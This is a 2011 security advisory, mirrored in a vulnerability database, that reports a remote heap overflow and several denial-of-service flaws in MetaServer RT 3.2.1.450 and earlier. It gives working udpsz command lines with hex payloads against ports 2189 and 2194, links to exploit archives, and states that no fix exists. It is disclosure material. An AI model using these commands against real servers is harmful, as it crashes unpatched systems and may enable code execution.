MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities

2014-07-01T00:00:00
ID SSV:72148
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #######################################################################

                             Luigi Auriemma

Application:  MetaServer RT
              http://www.traderssoft.com/ts/msrt/
Versions:     <= 3.2.1.450
Platforms:    Windows
Bugs:         A] heap overflow
              B] various Denials of Service
Exploitation: remote
Date:         19 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
(eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
that are not supported originally."


#######################################################################

=======
2) Bugs
=======


The program listens on ports 2189, 2192 and 2194.

----------------
A] heap overflow
----------------

Through an interrupted connection with multiple packets on port 2189
and a subsequent reconnection it's possible to cause a heap overflow
and the relative write4.
Both the "MESSA" and "ROSCO" commands can be used.


-----------------------------
B] various Denials of Service
-----------------------------

Various invalid memory accesses and freezing of the program.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17879.zip

A]
 udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

 stop after at least 50 dots and relaunch the command again till the
 crashing of the server during a memcpy.


B]
  udpsz -b 0x80 -T SERVER 2194 1000
  udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
  ...others...


#######################################################################

======
4) Fix
======


No fix.


#######################################################################